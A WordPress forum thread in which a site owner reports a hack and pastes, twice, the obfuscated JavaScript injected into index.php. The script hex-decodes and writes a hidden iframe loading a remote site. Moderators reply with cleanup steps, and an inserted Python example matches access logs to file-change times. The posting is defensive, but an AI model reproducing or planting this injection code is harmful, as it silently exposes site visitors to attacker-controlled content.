
the "check_content" hack (9 posts)

  1. Bonusball
    Member
    Posted 2 years ago #

    My blog was acting weird this afternoon. In fact it was skipping to the bottom of the page. I thought it was my browser.

    I looked at the code and saw there was a broken javascript function down there.

    </html><script>c46d8e='';r34077061db=document;r34077061db.write('<scr'+'ipt>function rf697c5(re40086){return e'+c46d8e+'val(re40086); }</scr'+'ipt>'); function c461134c94r11797(r864cd56e362){ var r171afc0f9=16; var d06='';return (rf697c5('pa'+d06+'rseInt')(r864cd56e362,r171afc0f9));}function rc419f0cdaed(r6dd7f24e03){ function rf59cee9(){var ra5f9b=2;return ra5f9b;} var r7aae136='';rb7d2a3653f6='fromCh';rd55dd87935=String[rb7d2a3653f6+'arCode'];for(r837a8d5035=0;r837a8d5035<r6dd7f24e03.length;r837a8d5035+=rf59cee9()){ r7aae136+=(rd55dd87935(c461134c94r11797(r6dd7f24e03.substr(r837a8d5035,rf59cee9()))));}return r7aae136;} var r4c2a3ca6ba='3C7363726970743E69662821'+c46d8e+'6D796961'+c46d8e+'297B646F63756D656E742E777269746528756E65736361'+c46d8e+'7065282027253363253639253636253732253631'+c46d8e+'253664253635253230253665253631'+c46d8e+'253664253635253364253633253334253336253230253733253732253633253364253237253638253734253734253730253361'+c46d8e+'25326625326625373425363525373225363925373325373425366625373225363925366525363325326525363325366625366425326625373425373325326625363925366525326525363325363725363925336625363325366625363425363925366526253237253262253464253631'+c46d8e+'253734253638253265253732253666253735253665253634253238253464253631'+c46d8e+'253734253638253265253732253631'+c46d8e+'253665253634253666253664253238253239253261'+c46d8e+'253334253334253337253333253239253262253237253331'+c46d8e+'253331'+c46d8e+'253632253633253339253635253332253237253230253737253639253634253734253638253364253339253230253638253635253639253637253638253734253364253334253339253337253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c46d8e+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c46d8e+'2536642536352533652729293B7D7661'+c46d8e+'72206D796961'+c46d8e+'3D747275653B3C2F7363726970743E';r34077061db.write(rc419f0cdaed(r4c2a3ca6ba));</script><script>check_content()</script>

    I suspected an errant plugin. I googled and found this:

    http://forums.digitalpoint.com/showthread.php?t=874041

    the post doesn't make a lot of sense, but I took a peek at recently modified files on the server, and found that index.php was modified.

    Sure enough:

    <?php
    /**
     * Front to the WordPress application. This file doesn't do anything, but loads
     * wp-blog-header.php which does and tells WordPress to load the theme.
     *
     * @package WordPress
     */
    
    /**
     * Tells WordPress to load the WordPress theme and output it.
     *
     * @var bool
     */
    define('WP_USE_THEMES', true);
    
    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');
    ?><script>c46d8e='';r34077061db=document;r34077061db.write('<scr'+'ipt>function rf697c5(re40086){return e'+c46d8e+'val(re40086); }</scr'+'ipt>');  function c461134c94r11797(r864cd56e362){ var r171afc0f9=16; var d06='';return (rf697c5('pa'+d06+'rseInt')(r864cd56e362,r171afc0f9));}function rc419f0cdaed(r6dd7f24e03){ function rf59cee9(){var ra5f9b=2;return ra5f9b;} var r7aae136='';rb7d2a3653f6='fromCh';rd55dd87935=String[rb7d2a3653f6+'arCode'];for(r837a8d5035=0;r837a8d5035<r6dd7f24e03.length;r837a8d5035+=rf59cee9()){ r7aae136+=(rd55dd87935(c461134c94r11797(r6dd7f24e03.substr(r837a8d5035,rf59cee9()))));}return r7aae136;} var r4c2a3ca6ba='3C7363726970743E69662821'+c46d8e+'6D796961'+c46d8e+'297B646F63756D656E742E777269746528756E65736361'+c46d8e+'7065282027253363253639253636253732253631'+c46d8e+'253664253635253230253665253631'+c46d8e+'253664253635253364253633253334253336253230253733253732253633253364253237253638253734253734253730253361'+c46d8e+'25326625326625373425363525373225363925373325373425366625373225363925366525363325326525363325366625366425326625373425373325326625363925366525326525363325363725363925336625363325366625363425363925366526253237253262253464253631'+c46d8e+'253734253638253265253732253666253735253665253634253238253464253631'+c46d8e+'253734253638253265253732253631'+c46d8e+'253665253634253666253664253238253239253261'+c46d8e+'253334253334253337253333253239253262253237253331'+c46d8e+'253331'+c46d8e+'253632253633253339253635253332253237253230253737253639253634253734253638253364253339253230253638253635253639253637253638253734253364253334253339253337253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c46d8e+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c46d8e+'2536642536352533652729293B7D7661'+c46d8e+'72206D796961'+c46d8e+'3D747275653B3C2F7363726970743E';r34077061db.write(rc419f0cdaed(r4c2a3ca6ba));</script><script>check_content()</script>

    I replaced the header, but does anyone know how this might have happened, or how I can prevent it?

  2. Bonusball
    Member
    Posted 2 years ago #

    I also see he's been in

    /wp-content/index.php

  3. Bonusball
    Member
    Posted 2 years ago #

    also wp-admin/index.php

    Has anyone else ever seen this hack?

  4. prettyboymp
    Member
    Posted 2 years ago #

    Can you provide a list of plugins you're running and who your hosting provider is?

  5. Rev. Voodoo
    Volunteer Moderator
    Posted 2 years ago #

    that looks like a hack to me!

    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    And when you're done:
    http://codex.wordpress.org/Hardening_WordPress

    all good reading there. Seems lately, a lot of people have been having rogue files loaded to their server that allow writing to WP files.

    Best way to find the files is with your access logs (hopefully you have access to them or can talk to your host).

    Find an altered file. Note the timestamp. Check your access logs for the time/date that the file was altered. See what file is accessing the altered file. Delete it.

    Also follow all the cleaning steps. Change your passwords after all is clean. ALL passwords. site/db/ftp
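
The access-log check described in the post above, as an added example that is not part of the original thread: it lists the requests logged within a short window around an altered file's modification time and puts POSTs to PHP scripts first. The log lines, the `cache.php` path, the timestamp and the 120-second window are constructed assumptions, and the Apache combined log format is assumed.

```python
import os
import re
from datetime import datetime, timedelta, timezone

# Constructed sample lines in Apache combined log format (not from the thread).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2010:09:14:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Mar/2010:09:14:58 +0000] "POST /wp-content/uploads/cache.php HTTP/1.1" 200 17 "-" "-"
203.0.113.7 - - [12/Mar/2010:09:15:30 +0000] "GET /feed/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Mar/2010:11:40:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "-"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')

def file_mtime(path):
    """Modification time of an altered file as a timezone-aware UTC datetime."""
    return datetime.fromtimestamp(os.path.getmtime(path), tz=timezone.utc)

def parse_line(line):
    """Parse one log line; return None for lines that do not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": ip, "time": when, "method": method, "path": path, "status": int(status)}

def is_php_post(entry):
    """POSTs to a PHP script are the requests most likely to have written files."""
    return entry["method"] == "POST" and entry["path"].split("?")[0].endswith(".php")

def requests_near(log_text, modified_at, window_seconds=120):
    """Requests within the window around modified_at, PHP POSTs listed first."""
    window = timedelta(seconds=window_seconds)
    hits = [e for e in map(parse_line, log_text.splitlines())
            if e and abs(e["time"] - modified_at) <= window]
    hits.sort(key=lambda e: (not is_php_post(e), e["time"]))
    return hits

if __name__ == "__main__":
    # Constructed timestamp standing in for file_mtime("index.php").
    altered = datetime(2010, 3, 12, 9, 15, 0, tzinfo=timezone.utc)
    for e in requests_near(SAMPLE_LOG, altered):
        print(e["time"].isoformat(), e["ip"], e["method"], e["path"], e["status"])
```

A file's modification time can be reset by whoever wrote the file, so on Unix hosts also compare `os.stat(path).st_ctime`, which cannot be set through `utime`.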

  6. Bonusball
    Member
    Posted 2 years ago #

    Thanks. It happened again this morning, I am trying to clean this up.

  7. Rev. Voodoo
    Volunteer Moderator
    Posted 2 years ago #

    yup....you have to find the source...or it's just gonna keep coming back..

    Good luck! I hated going through that

  8. Bonusball
    Member
    Posted 2 years ago #

    I have a few blogs hosted on my server, 2 or 3 of them were hacked this way.

    Here's a great post about what to do when it happens:

    http://www.snipe.net/2010/01/when-wordpress-gets-hacked/

  9. Rev. Voodoo
    Volunteer Moderator
    Posted 2 years ago #

    that is a pretty good link...bookmarked!
